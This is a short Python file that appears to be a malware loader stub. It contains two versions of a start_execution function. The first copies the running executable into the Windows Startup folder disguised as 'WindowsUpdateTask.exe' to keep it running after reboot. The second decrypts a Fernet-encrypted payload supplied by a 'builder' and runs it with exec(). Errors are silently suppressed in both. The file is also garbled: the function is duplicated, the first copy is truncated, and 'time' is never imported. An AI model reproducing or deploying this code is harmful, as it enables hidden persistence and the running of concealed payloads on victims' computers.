import os 
import shutil
import sys 

def start_execution():
    try:
        if os.name == 'nt': # Only Windows
            current_path = sys.executable if getattr(sys, 'frozen', False) else os.path.realpath(__file__)
            startup_folder = os.path.join(os.getenv('APPDATA'), r'Microsoft\Windows\Start Menu\Programs\Startup')
            target_file = os.path.join(startup_folder, "WindowsUpdateTask.exe")

            if not os.path.exists(target_file):
                shutil.copyfile(current_path, target_file)
    except:
        pass 
    # --------------------------------------------

    time.sleep(10) 
    
    
    cipher = Fernet(KEY)
    
import base64
from cryptography.fernet import Fernet

# Insert the encrypted data and key generated by the builder below:
KEY = b'Your_Generated_Key'
ENCRYPTED_DATA = b'Your_Encryped_Data'

def start_execution():
    try:
        
        time.sleep(10)
        
        
        cipher = Fernet(KEY)
        decrypted_code = cipher.decrypt(ENCRYPTED_DATA)
        
        
        exec(decrypted_code.decode('utf-8'), globals())
    except Exception:
        pass

if __name__ == "__main__":
    start_execution()

